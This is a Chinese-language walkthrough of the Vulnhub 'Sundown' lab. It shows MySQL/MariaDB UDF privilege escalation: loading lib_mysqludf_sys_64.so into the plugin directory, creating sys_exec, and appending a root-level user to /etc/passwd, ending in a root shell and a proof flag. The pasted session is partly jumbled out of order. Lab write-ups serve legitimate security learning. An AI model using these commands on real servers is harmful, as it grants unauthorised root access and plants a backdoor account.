利用Mysql提权的步骤以及一种低级错误的说明
通过一些方式获取了目标主机mysql的用户名和密码,这时我们想通过mysql来执行系统命令,此时我们可以考虑使用UDF进行提权。需要提前将lib_mysqludf_sys_64.so文件(Kali linux上有该文件)上传至靶机/tmp目录下。然后连接数据库。另外需要提前生成具有root权限的用户的密码:
┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo openssl passwd -1 -salt bob 123456
$1$bob$7Llv2KscjOtcMna9mt7Ps0
目标就是将bob(具有root权限)追加到/etc/passwd文件中去,即:
bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash
然后在数据库中进行如下步骤:
第一步:use mysql;
第二步:创建新表: create table potato(line blob);
第三步:插入插件:insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
SHOW VARIABLES LIKE ‘%plugin%’;
select * from potato into dumpfile
‘/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so’;
create function sys_exec returns integer soname ‘lib_mysqludf_sys_64.so’;
接下来,在进入插入用户名密码过程中犯了一个低级错误,即
select sys_exec('echo "bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
双引号在里面导致美元符号会被解释,从而密码验证的时候会不对,导致验证失败。
如下所示:
MariaDB [mysql]> select sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_exec('echo "jason:12345:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ su - jason
Password:
su: Authentication failure
其实只需将sys_exec命令的单引号与双引号互换即可正确执行,完整过程如下:
carlos@sundown:/tmp$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 161571
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.009 sec)
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)
MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name | Value |
+-----------------+---------------------------------------------+
| plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)
MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)
MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64MariaDB [mysql]> select sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd");
+--------------------------------------------------------------------------------------------------------+
| sys_exec("echo 'bob:$1$bob$7Llv2KscjOtcMna9mt7Ps0:0:0:User_like_root:/root:/bin/bash' >> /etc/passwd") |
+--------------------------------------------------------------------------------------------------------+
| 0 |
+--------------------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)
MariaDB [mysql]>carlos@sundown:/tmp$ su - bob
Password:
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# ls -alh
total 28K
drwx------ 3 root root 4.0K Aug 3 2020 .
drwxr-xr-x 18 root root 4.0K Aug 3 2020 ..
lrwxrwxrwx 1 root root 9 Aug 3 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 3 2020 .local
lrwxrwxrwx 1 root root 9 Aug 3 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.3K Aug 3 2020 proof.txt
-rw-r--r-- 1 root root 66 Aug 3 2020 .selected_editor
root@sundown:~# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC
510252fabb4b7e7dddd7373b7b3da3e8
Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~#
quit
.so';
Query OK, 0 rows affected (0.000 sec)